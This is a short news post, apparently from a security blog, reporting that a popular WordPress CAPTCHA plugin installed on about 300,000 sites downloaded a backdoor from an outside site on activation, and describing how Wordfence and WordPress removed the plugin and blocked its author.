WordPress Plugin Installed Backdoor on 300K Website

Plugins are very useful addition that is used by webmaster to add new features and functionality to the website. As this add features it also may open new vulnerability on the website. This what we usually have with daily plugins update and releases that come to fix critical security issues.

WordPress provide an automated notification alert when new plugin update which usually applied manually by the webmaster. CAPTCHA solutions for WordPress one of the most popular captcha plugins provided on the official repository have been used to distribute backdoor. The plugin was recently removed from repo but the damage looks to be big with about 300,000 users installed the malicious plugin.

The process of infection is not directly from wordpress repo but as user will install/activate the plugin the plugin will connect to simplywordpress website to download Zip file and extract/install it which contain the backdoor. Generally on major repository we usually have a scan engine that runs against each project and code to identify any malicious peace of code or even a vulnerable software.

After discovering the backdoor wordfence started to work with wordpress to remove the patched version which install the malware and they have blocked the plugin author account so he will not be able to push other update or new versions for that plugin.

100000 sites rolled back the installation for that plugin which include the malware. The author still providing several other plugins with the backdoor that are not provided on wordpress repository and here it is hard to control those plugins and it will be better to avoid any plugin not certified by wordpress.org.

Notify of
Inline Feedbacks
View all comments